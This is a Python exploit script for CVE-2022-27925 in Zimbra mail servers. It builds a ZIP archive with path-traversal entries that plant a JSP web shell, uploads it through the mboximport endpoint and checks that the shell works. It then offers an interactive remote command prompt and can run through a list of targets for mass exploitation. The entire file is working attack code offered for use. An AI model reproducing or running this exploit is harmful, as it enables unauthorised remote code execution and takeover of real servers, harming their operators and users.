exploit.py

import argparse
import zipfile
import io
import random
import string
import requests
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


webshell_payload = r'<%@ page import="java.util.*,java.io.*"%><%%><HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUTTYPE="submit" VALUE="Send"></FORM><pre><%if (request.getParameter("cmd") != null) {    out.println("Command: " + request.getParameter("cmd") + "<div>");    Process p;    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));    }    else{        p = Runtime.getRuntime().exec(request.getParameter("cmd"));    }    OutputStream os = p.getOutputStream();    InputStream in = p.getInputStream();    DataInputStream dis = new DataInputStream(in);    String disr = dis.readLine();    while ( disr != null ) {    out.println(disr);    disr = dis.readLine();    }}%><div></pre></BODY></HTML>'
char_set = string.ascii_uppercase + string.digits
webshell_name = ''.join(random.sample(char_set*6, 6)) + '.jsp'
#vuln_paths = ["service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd", "service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1"]
BLUE = "\033[1;34m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"
RED = "\033[31m"

ITERATE = False


def banner():
    return CYAN+'''
 _____   _           __              
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ / 
/____/_/_/ /_/ /_/_.___/_/   \__,_/  
                    CVE-2022-27925   
            '''

# FIX URL
def fix_url(url):
    if not url.startswith('https://'):
        url = 'https://' + url
        url = url.rstrip("/")
    return url

def build_zip(jsp, path):
    zip_buffer = io.BytesIO()
    zf = zipfile.ZipFile(zip_buffer, 'w')
    zf.writestr(path, jsp)
    zf.close()
    return zip_buffer.getvalue()

def exploit(host, payload, cmd):
    headers = {'content-Type': 'application/x-www-form-urlencoded'}
    try:
        r = requests.post(
            host + '', data=payload, headers=headers, verify=False, timeout=20)
        r = requests.post(
            host + '/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1', data=payload, headers=headers, verify=False, timeout=20)
        print(GREEN + '[!] Testing webshell')
        r = requests.get(host + '/zimbraAdmin/' + webshell_name +
                         '?cmd=' + cmd, verify=False, timeout=20)
        if "Josexv1" in r.text:
            print(CYAN + '[+] Webshell works!!')
            print(GREEN + '[+] WebShell location: ' +
                  host + '/zimbraAdmin/' + webshell_name + "")
            r = requests.get(host + '/zimbraAdmin/' + webshell_name +
                         '?cmd=uname+-a' , verify=False, timeout=20)
            print(BLUE + '[+] Uname -a output: '+ CYAN + r.text.split('<div>')
                                  [1].split('</div>')[0].strip())
            return True
        else:
            print(RED + '[-] Target not vulnerable')
            return False
    except:
        print(RED + '[!] Connection error')

def ping_url(url):
    try:
        r = requests.get(url, verify=False, timeout=10)
        if r.status_code == 200:
            print(CYAN + '[!] Target is up!')
            return True
        else:
            print(RED + '[!] Target is down! Next >> \n')
            return False
    except:
        return False

def main(url):
    paths = [
        '../../../../mailboxd/webapps/zimbraAdmin/',
        '../../../../jetty_base/webapps/zimbraAdmin/',
        '../../../../jetty/webapps/zimbraAdmin/']
    work = 0
    try:
        for num in range(0, 3):
            print(
                GREEN + '[!] Creating malicious ZIP path: ' + BLUE + paths[num])
            zippedfile = build_zip(webshell_payload, paths[num]+webshell_name)
            print(GREEN + '[!] Exploiting!')
            if exploit(url, zippedfile, 'echo "Josexv1"'):
                if args.target:
                    answer = input(
                        CYAN + '[+] Want to interact with webshell via terminal? (y/n): ')
                    if answer == "y":
                        print(GREEN + '[!] Sending commands to: ' +
                            url + '/zimbraAdmin/' + webshell_name)
                        while True:
                            cmd = input(GREEN + "[+] $ > " + BLUE)
                            if cmd == "exit":
                                break
                            req = requests.get(
                                url + "/zimbraAdmin/" + webshell_name + "?cmd=" + cmd, verify=False, timeout=20)
                            try:
                                print(CYAN + req.text.split('<div>')
                                    [1].split('</div>')[0].strip())
                            except:
                                print(RED + "[!] Error ?")
                    else:
                        print(RED + '[!] Bye!')
                        exit()
    except:
        print(RED + '[!] URL Error')
        ITERATE = True

if __name__ == "__main__":
    print(banner())
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '-t', '--target', help='URl with protocol HTTPS', default=False)
    parser.add_argument("-l", "--list", action="store",
                        help="List of targets", default=False)
    args = parser.parse_args()
    if args.target is not False:
        url = fix_url(args.target)
        print(GREEN + '[!] Testing URL: '+ url)
        if ping_url(url):
            main(url)
    elif args.list is not False:
        with open(args.list, "rb") as targets:
            for target in targets:
                target = target.rstrip().decode("utf-8")
                url = fix_url(target)
                print(GREEN + '[!] Testing URL: '+ url)
                if ping_url(url):
                    main(url)
    else:
        parser.print_help()
        parser.exit()